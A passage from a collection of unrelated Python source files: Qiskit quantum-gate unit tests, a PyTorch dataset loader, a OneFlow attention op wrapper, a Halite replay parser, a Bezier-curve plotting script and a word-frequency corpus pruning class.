self.assertEqual(qargs, [self.qr[1]])
def test_u2_wires(self):
self.circuit.u2(1, 2, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u2')
self.assertEqual(op.params, [1, 2])
self.assertEqual(qargs, [self.qr[1]])
def test_u2_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.u2, 0, self.cr[0], self.qr[0])
self.assertRaises(QiskitError, qc.u2, 0, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.u2, 0, self.qr[1], 0)
self.assertRaises(QiskitError, qc.u2, 0, 0, self.cr[0])
self.assertRaises(QiskitError, qc.u2, 0, 0, .0)
self.assertRaises(QiskitError, qc.u2, 0, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.u2, 0, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.u2, 0, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.u2, 0, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.u2, 0, 0, 'a')
def test_u2_reg(self):
instruction_set = self.circuit.u2(1, 2, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'u2')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1, 2])
def test_u2_reg_inv(self):
instruction_set = self.circuit.u2(1, 2, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'u2')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [-pi - 2, -1 + pi])
def test_u2_pi(self):
self.circuit.u2(pi / 2, 0.3 * pi, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u2')
self.assertEqual(op.params, [pi / 2, 0.3 * pi])
self.assertEqual(qargs, [self.qr[1]])
def test_u3(self):
self.circuit.u3(1, 2, 3, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u3')
self.assertEqual(op.params, [1, 2, 3])
self.assertEqual(qargs, [self.qr[1]])
def test_u3_wires(self):
self.circuit.u3(1, 2, 3, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u3')
self.assertEqual(op.params, [1, 2, 3])
self.assertEqual(qargs, [self.qr[1]])
def test_u3_invalid(self):
qc = self.circuit
# TODO self.assertRaises(QiskitError, qc.u3, 0, self.cr[0], self.qr[0])
self.assertRaises(QiskitError, qc.u3, 0, 0, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.u3, 0, 0, self.qr[1], 0)
self.assertRaises(QiskitError, qc.u3, 0, 0, 0, self.cr[0])
self.assertRaises(QiskitError, qc.u3, 0, 0, 0, .0)
self.assertRaises(QiskitError, qc.u3, 0, 0, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.u3, 0, 0, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.u3, 0, 0, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.u3, 0, 0, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.u3, 0, 0, 0, 'a')
def test_u3_reg(self):
instruction_set = self.circuit.u3(1, 2, 3, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'u3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1, 2, 3])
def test_u3_reg_inv(self):
instruction_set = self.circuit.u3(1, 2, 3, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'u3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1, -3, -2])
def test_u3_pi(self):
self.circuit.u3(pi, pi / 2, 0.3 * pi, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u3')
self.assertEqual(op.params, [pi, pi / 2, 0.3 * pi])
self.assertEqual(qargs, [self.qr[1]])
def test_x(self):
self.circuit.x(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'x')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_x_wires(self):
self.circuit.x(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'x')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_x_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.x, self.cr[0])
self.assertRaises(QiskitError, qc.x, self.cr)
self.assertRaises(QiskitError, qc.x, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.x, 0.0)
def test_x_reg(self):
instruction_set = self.circuit.x(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'x')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_x_reg_inv(self):
instruction_set = self.circuit.x(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'x')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_y(self):
self.circuit.y(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'y')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_y_wires(self):
self.circuit.y(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'y')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_y_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.y, self.cr[0])
self.assertRaises(QiskitError, qc.y, self.cr)
self.assertRaises(QiskitError, qc.y, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.y, 0.0)
def test_y_reg(self):
instruction_set = self.circuit.y(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'y')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_y_reg_inv(self):
instruction_set = self.circuit.y(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'y')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_z(self):
self.circuit.z(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'z')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_z_wires(self):
self.circuit.z(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'z')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_z_reg(self):
instruction_set = self.circuit.z(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'z')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_z_reg_inv(self):
instruction_set = self.circuit.z(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'z')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_broadcast_does_not_duplicate_instructions(self):
self.circuit.rz(0, range(6))
instructions = [inst for inst, qargs, cargs in self.circuit.data]
self.assertEqual(len(set(id(inst) for inst in instructions)), 6)
self.circuit.data = []
self.circuit.rz(0, self.qr)
instructions = [inst for inst, qargs, cargs in self.circuit.data]
self.assertEqual(len(set(id(inst) for inst in instructions)), 3)
class TestStandard2Q(QiskitTestCase):
"""Standard Extension Test. Gates with two Qubits"""
def setUp(self):
self.qr = QuantumRegister(3, "q")
self.qr2 = QuantumRegister(3, "r")
self.cr = ClassicalRegister(3, "c")
self.circuit = QuantumCircuit(self.qr, self.qr2, self.cr)
def test_barrier_reg_bit(self):
self.circuit.barrier(self.qr, self.qr2[0])
self.assertEqual(len(self.circuit), 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'barrier')
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2], self.qr2[0]])
def test_ch_reg_reg(self):
instruction_set = self.circuit.ch(self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'ch')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_ch_reg_reg_inv(self):
instruction_set = self.circuit.ch(self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'ch')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_ch_reg_bit(self):
instruction_set = self.circuit.ch(self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'ch')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_ch_reg_bit_inv(self):
instruction_set = self.circuit.ch(self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'ch')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_ch_bit_reg(self):
instruction_set = self.circuit.ch(self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'ch')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_crz_reg_reg(self):
instruction_set = self.circuit.crz(1, self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_crz_reg_reg_inv(self):
instruction_set = self.circuit.crz(1, self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_crz_reg_bit(self):
instruction_set = self.circuit.crz(1, self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_crz_reg_bit_inv(self):
instruction_set = self.circuit.crz(1, self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_crz_bit_reg(self):
instruction_set = self.circuit.crz(1, self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_crz_bit_reg_inv(self):
instruction_set = self.circuit.crz(1, self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_cu1_reg_reg(self):
instruction_set = self.circuit.cu1(1, self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_cu1_reg_reg_inv(self):
instruction_set = self.circuit.cu1(1, self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_cu1_reg_bit(self):
instruction_set = self.circuit.cu1(1, self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_cu1_reg_bit_inv(self):
instruction_set = self.circuit.cu1(1, self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_cu1_bit_reg(self):
instruction_set = self.circuit.cu1(1, self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_cu1_bit_reg_inv(self):
instruction_set = self.circuit.cu1(1, self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_cu3_reg_reg(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1, 2, 3])
def test_cu3_reg_reg_inv(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1, -3, -2])
def test_cu3_reg_bit(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1, 2, 3])
def test_cu3_reg_bit_inv(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1, -3, -2])
def test_cu3_bit_reg(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1, 2, 3])
def test_cu3_bit_reg_inv(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1, -3, -2])
def test_cx_reg_reg(self):
instruction_set = self.circuit.cx(self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cx_reg_reg_inv(self):
instruction_set = self.circuit.cx(self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cx_reg_bit(self):
instruction_set = self.circuit.cx(self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cx_reg_bit_inv(self):
instruction_set = self.circuit.cx(self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cx_bit_reg(self):
instruction_set = self.circuit.cx(self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cx_bit_reg_inv(self):
instruction_set = self.circuit.cx(self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_reg_reg(self):
instruction_set = self.circuit.cy(self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_reg_reg_inv(self):
instruction_set = self.circuit.cy(self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_reg_bit(self):
instruction_set = self.circuit.cy(self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_reg_bit_inv(self):
instruction_set = self.circuit.cy(self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_bit_reg(self):
instruction_set = self.circuit.cy(self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_bit_reg_inv(self):
instruction_set = self.circuit.cy(self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_reg_reg(self):
instruction_set = self.circuit.cz(self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_reg_reg_inv(self):
instruction_set = self.circuit.cz(self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_reg_bit(self):
instruction_set = self.circuit.cz(self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_reg_bit_inv(self):
instruction_set = self.circuit.cz(self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_bit_reg(self):
instruction_set = self.circuit.cz(self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_bit_reg_inv(self):
instruction_set = self.circuit.cz(self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_swap_reg_reg(self):
instruction_set = self.circuit.swap(self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'swap')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_swap_reg_reg_inv(self):
instruction_set = self.circuit.swap(self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'swap')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
class TestStandard3Q(QiskitTestCase):
"""Standard Extension Test. Gates with three Qubits"""
def setUp(self):
self.qr = QuantumRegister(3, "q")
self.qr2 = QuantumRegister(3, "r")
self.qr3 = QuantumRegister(3, "s")
self.cr = ClassicalRegister(3, "c")
self.circuit = QuantumCircuit(self.qr, self.qr2, self.qr3, self.cr)
def test_ccx_reg_reg_reg(self):
instruction_set = self.circuit.ccx(self.qr, self.qr2, self.qr3)
self.assertEqual(instruction_set.instructions[0].name, 'ccx')
self.assertEqual(instruction_set.qargs[1],
[self.qr[1], self.qr2[1], self.qr3[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_ccx_reg_reg_inv(self):
instruction_set = self.circuit.ccx(self.qr, self.qr2, self.qr3).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'ccx')
self.assertEqual(instruction_set.qargs[1],
[self.qr[1], self.qr2[1], self.qr3[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cswap_reg_reg_reg(self):
instruction_set = self.circuit.cswap(self.qr, self.qr2, self.qr3)
self.assertEqual(instruction_set.instructions[0].name, 'cswap')
self.assertEqual(instruction_set.qargs[1],
[self.qr[1], self.qr2[1], self.qr3[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cswap_reg_reg_inv(self):
instruction_set = self.circuit.cswap(self.qr, self.qr2, self.qr3).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cswap')
self.assertEqual(instruction_set.qargs[1],
[self.qr[1], self.qr2[1], self.qr3[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
if __name__ == '__main__':
unittest.main(verbosity=2)
|
py | 1a40c48db9a8c6970532f6d51f59a5a86173e94f | import torch
from torch.utils.data import Dataset
import os
import pickle
class ToxicData(Dataset):
def __init__(self, root, dcat, max_len) -> None:
super(ToxicData, self).__init__()
src_path = os.path.join(root, dcat + '/src.pkl')
tgt_path = os.path.join(root, dcat + '/tgt.pkl')
self.src = pickle.load(open(src_path, 'rb'))
self.tgt = pickle.load(open(tgt_path, 'rb'))
self.max_len = max_len
def __getitem__(self, index):
input = torch.tensor(self.src[index][:self.max_len])
output = torch.tensor(self.tgt[index])
return input, output
def __len__(self):
return len(self.src)
|
py | 1a40c4e88d57df4d7e03317905cc64cc1df64e06 | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import typing
import oneflow._oneflow_internal
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client.framework import id_util as id_util
def api_fused_self_attention_query_mul_key_and_value(
x: oneflow._oneflow_internal.BlobDesc,
head_size: int,
alpha: float = 1.0,
name: typing.Optional[str] = None,
) -> oneflow._oneflow_internal.BlobDesc:
if name is None:
name = id_util.UniqueStr("FusedSelfAttentionQueryMulKeyAndValue_")
op = (
flow.user_op_builder(name)
.Op("fused_self_attention_query_mul_key_and_value")
.Input("hidden_states", [x])
.Attr("head_size", int(head_size))
.Attr("alpha", float(alpha))
.Output("query_mul_key")
.Output("value")
.Build()
)
(qmk, v) = op.InferAndTryRun().RemoteBlobList()
return (qmk, v)
|
py | 1a40c59ed102cbbc910818f2604aef4be0f3cd8d | import copy
import json
import os
import os.path
import zstd
import hlt
ARBITRARY_ID = -1
def parse_replay_file(file_name, player_name):
print("Load Replay: " + file_name)
with open(file_name, 'rb') as f:
data = json.loads(zstd.loads(f.read()))
print("Load Basic Information")
player = [p for p in data['players'] if p['name'].split(" ")[0] == player_name][0]
player_id = int(player['player_id'])
my_shipyard = hlt.Shipyard(player_id, ARBITRARY_ID,
hlt.Position(player['factory_location']['x'], player['factory_location']['y']))
other_shipyards = [
hlt.Shipyard(p['player_id'], ARBITRARY_ID, hlt.Position(p['factory_location']['x'], p['factory_location']['y']))
for p in data['players'] if int(p['player_id']) != player_id]
width = data['production_map']['width']
height = data['production_map']['height']
print("Load Cell Information")
first_cells = []
for x in range(len(data['production_map']['grid'])):
row = []
for y in range(len(data['production_map']['grid'][x])):
row += [hlt.MapCell(hlt.Position(x, y), data['production_map']['grid'][x][y]['energy'])]
first_cells.append(row)
frames = []
for f in data['full_frames']:
prev_cells = first_cells if len(frames) == 0 else frames[-1]._cells
new_cells = copy.deepcopy(prev_cells)
for c in f['cells']:
new_cells[c['y']][c['x']].halite_amount = c['production']
frames.append(hlt.GameMap(new_cells, width, height))
print("Load Player Ships")
moves = [{} if str(player_id) not in f['moves'] else {m['id']: m['direction'] for m in f['moves'][str(player_id)] if
m['type'] == "m"} for f in data['full_frames']]
ships = [{} if str(player_id) not in f['entities'] else {
int(sid): hlt.Ship(player_id, int(sid), hlt.Position(ship['x'], ship['y']), ship['energy']) for sid, ship in
f['entities'][str(player_id)].items()} for f in data['full_frames']]
print("Load Other Player Ships")
other_ships = [
{int(sid): hlt.Ship(int(pid), int(sid), hlt.Position(ship['x'], ship['y']), ship['energy']) for pid, p in
f['entities'].items() if
int(pid) != player_id for sid, ship in p.items()} for f in data['full_frames']]
print("Load Droppoff Information")
first_my_dropoffs = [my_shipyard]
first_them_dropoffs = other_shipyards
my_dropoffs = []
them_dropoffs = []
for f in data['full_frames']:
new_my_dropoffs = copy.deepcopy(first_my_dropoffs if len(my_dropoffs) == 0 else my_dropoffs[-1])
new_them_dropoffs = copy.deepcopy(first_them_dropoffs if len(them_dropoffs) == 0 else them_dropoffs[-1])
for e in f['events']:
if e['type'] == 'construct':
if int(e['owner_id']) == player_id:
new_my_dropoffs.append(
hlt.Dropoff(player_id, ARBITRARY_ID, hlt.Position(e['location']['x'], e['location']['y'])))
else:
new_them_dropoffs.append(
hlt.Dropoff(e['owner_id'], ARBITRARY_ID, hlt.Position(e['location']['x'], e['location']['y'])))
my_dropoffs.append(new_my_dropoffs)
them_dropoffs.append(new_them_dropoffs)
return list(zip(frames, moves, ships, other_ships, my_dropoffs, them_dropoffs))
def parse_replay_folder(folder_name, player_name, max_files=None):
replay_buffer = []
for file_name in sorted(os.listdir(folder_name)):
if not file_name.endswith(".hlt"):
continue
elif max_files is not None and len(replay_buffer) >= max_files:
break
else:
replay_buffer.append(parse_replay_file(os.path.join(folder_name, file_name), player_name))
return replay_buffer
|
py | 1a40c678accb7ef43346ed0387d30499f5305586 | # Autores:
# Diego Carballido Álvarez ([email protected])
# José Antonio Figueiras Martínez ([email protected])
import matplotlib.pyplot as plt
import numpy as np
#funcion recurvisa
def B(coorArr, i, j, t):
if j == 0:
return coorArr[i]
return B(coorArr, i, j - 1, t) * (1 - t) + B(coorArr, i + 1, j - 1, t) * t
#Puntos de control
P=np.array([[0.75, 1.5],[1., 1.],[2.,1.],[2.75,1.],[3.,1.5],[3.1,1.75],
[3.,2.],[2.75,2.5],[2.,2.5],[1.,2.5],[0.75,2.],[0.75,1.75],
[0.75,1.5],[0.75,1.],[1.,0.5],[1.5,0.],[2.,0.],[2.75,0.],[3.,0.25]])
fig=plt.figure("Letra e")
ini=0; fin=3
#Una iteración del for por cada curva
for k in range(0,9):
x=P[ini:fin,0]
y=P[ini:fin,1]
n=x.size
xb=[]
yb=[]
for t in np.linspace(0.,1.,25):
a = B(x, 0, n - 1, t)
b = B(y, 0, n - 1, t)
xb.append(a)
yb.append(b)
plt.plot(xb,yb)
ini=fin-1
fin=ini+n
plt.plot(P[:,0],P[:,1],'c--',P[:,0],P[:,1],'ko',ms=8)
plt.xticks([])
plt.yticks([])
plt.axis('off')
plt.axis([min(P[:,0])-0.065,max(P[:,0])+.05,min(P[:,1])-0.05,max(P[:,1])+0.05])
plt.show() |
py | 1a40c7a6eef6ff0d39dc2ec8e88d2eb9f079b4eb | import re
import glob
import pandas as pd
from . import clean
class Corpus(object):
"""Docstring"""
def __init__(self, docs_paths):
self.corpus = []
self.docs_names = docs_paths
def load(self):
"""
:return A list of Strings each one being a document
"""
for file_name in self.docs_names:
with open(file_name, 'r') as fh:
new_discussion = {}
text = fh.read().split("\n\n")
new_discussion["id"] = file_name[-12:-4]
new_discussion["question_title"] = text[0]
new_discussion["question_body"] = text[1]
new_discussion["answers"] = text[2:]
self.corpus.append(new_discussion)
def get_discussions_text(self):
"""docstring"""
return [
" ".join([
doc["question_title"],
doc["question_body"],
" ".join(doc["answers"])]
)
for doc in self.corpus
]
def corpus_word_frequency(self):
"""docstring"""
corpus_text = self.get_discussions_text()
bag_of_words = " ".join(corpus_text).split()
tokens = set(bag_of_words)
words_frequency = {}
for doc in corpus_text:
text = doc.split()
for word in tokens:
if word in text:
if word in words_frequency.keys():
words_frequency[word] += 1
else:
words_frequency[word] = 1
return words_frequency
def export_pruned(self, limits, destination):
"""docstring"""
if not self.corpus:
print("A corpus need to be loaded first")
return
upper_pruning = None
lower_pruning = None
word_count = self.corpus_word_frequency()
word_count_df = pd.DataFrame.from_dict(
word_count, orient="index", columns=["w_count"])
if "upper" in limits.keys():
upper_pruning = word_count_df.loc[
word_count_df.w_count > limits["upper"]
]
if "lower" in limits.keys():
lower_pruning = word_count_df.loc[
word_count_df.w_count < limits["lower"]
]
print(list(upper_pruning.index))
for doc in self.corpus:
file_name = destination + "instance_" + doc["id"] + ".txt"
question_title = doc["question_title"]
question_body = doc["question_body"]
answers = doc["answers"]
if "upper" in limits.keys():
question_title = " ".join(
[word for word in question_title.split()
if word not in list(upper_pruning.index)])
question_body = " ".join(
[word for word in question_body.split()
if word not in list(upper_pruning.index)])
answers = [
[word for word in answer.split()
if word not in list(upper_pruning.index)]
for answer in answers
]
answers = [" ".join(txt) for txt in answers if txt]
if "lower" in limits.keys():
question_title = " ".join(
[word for word in question_title.split()
